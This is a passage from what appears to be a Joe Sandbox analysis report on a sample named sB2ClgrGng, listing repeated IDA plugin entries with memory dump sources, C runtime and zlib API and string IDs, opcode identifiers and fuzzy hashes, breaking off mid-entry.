                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                                • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                • Instruction ID: 7af50af0513e55ba3daf59a84b5b74b4205ed6dd27453a187539f5bb9d006921
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF19F76B0C2C58EE7A5BB18C8E9A3A3AA9EF44744F054138DE4987798DF3CE440DB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                • Instruction ID: 104b87b95f272d74c55f722347b658c1f9282c76e660145929913e580e2caf4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B11A77A08B89CEEB15DF29C8863687BA0F784B48F158925DE5D877A8CF3AD451C700
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                                • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                • Instruction ID: 1d61e69d8dfd9c5b978d3e0dc04578c73920fea14eb13f56235c8719ae981d8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8E18472A0CA468AEB68BF2581D213D33A1FF45B48F146135DE4E87799DF2BE891C740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                                • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                • Instruction ID: 5c1efce6c8a0ebef264172932663f33449ee4d461f2f212bd3d88037343c116a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8391B672B1C2858FE7A5BF14C8E9B3E3AA9FB44354F114139DE5A86689DF38E540CB00
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                                • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                • Instruction ID: dc10c20fcf710afe9feed4c40d406436835f27fd55ff699b12b4216d3ddea0a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B516822B1C2C58AE725BE3598827696B91F744B94F488231CF98CBACACE7DD440C700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                • Instruction ID: 3fd9c301068c19d2c47e37ad177e51068fe356b0785b1b6ac0d608d770b16040
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B902B321B1EE47CDFA56BB11A8C72796680AF46BA0F454634ED6DC63DADF3EE4418300
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                • Instruction ID: b4698f5e693a508abb366eebd1bb4a1250f1e38f72cd7e512d712f164574903a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EA13763A0C7CA8BEB21EF25A4817AD7BD1AB65B84F058131DE4D8778ADE3DE501C701
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                • Instruction ID: a18e655ac1ad4da0ca3746df9003b3fa00f12c5080554a177aa0ce4de43277e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF51DE11F1DA0B4AFA69BB27598317A5290AF84BD4F498434DE1EC77DEEE3CF4429200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                • Instruction ID: d7c5b836f7f6349558e39380ebbc41070f96a1087c6f6748ce252b4a152a49da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CB09220E0BA42CAEA093B616CC321822A5BF88701F980138C80D80334DE2C64E59700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                • Instruction ID: 01baa0a6f4b887f54b5742b4c3523d4a15af8fb3b753fc73b05525eb56c677e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56D1A372A0C6468AEB69FE29849227D27A0EF05B48F146235CE0D87799DF3FE845D740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                • Instruction ID: 5676076d6b1eac24e9e1e842d04933dad91d31ee8234f73b290ead182a7df030
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59C17E762181E08BD289EB29E8B947A73E1F78930DB95406BEF8747785CA3CE514DB10
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                • Instruction ID: 7d27aca706c8b3b15e6ae6cd98469d3195d0be2623ca10ec2d3e3e7c85b3ab9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71B15C7691CB8589E765EF29C09223CBBA0EB49B48F244135CE4E8739ACF39D441C754
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                • Instruction ID: 80a0d4ff9bd2ba7e9eb951b00f1ed45b13507da800f8e2ebd29b2cd8550b9edc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5281AE72A0C6818AEA74FB19A48237A7A91FB95794F144235DE9DC3B9DDF3DE4408B00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
                                                                                                                                                                                                                                • Instruction ID: 5cd34181514acc371b20f9bedcb54223ccb6a422321c329250db926a89ba7f58
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8261F822E0CA52CEF775BA6894D267D6680AF50764F144239EE1ED3ADDDE7EE840C700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                • Instruction ID: f459eb7dae979dbc3ecd0263c6ed20dcfcb6442fcb795606aecab63e8bcbde2a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51A176A1C6518AE764AB29C08133833A0EB55F69F244131DE4D97799CF3AE853C740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                • Instruction ID: a9a52dad15665ebe83f7c2022cef886a2e6feab5dfdf2740c6a777984777af75
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1451A576A1C6518AE725AB29C48133837A0EB44F59F244231CE8D9779DDF3AEC93C740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                • Instruction ID: 103ab3439aaadb8f76600ed15076b9e6bb99d8cd2095bca49c4fc77ff7519c17
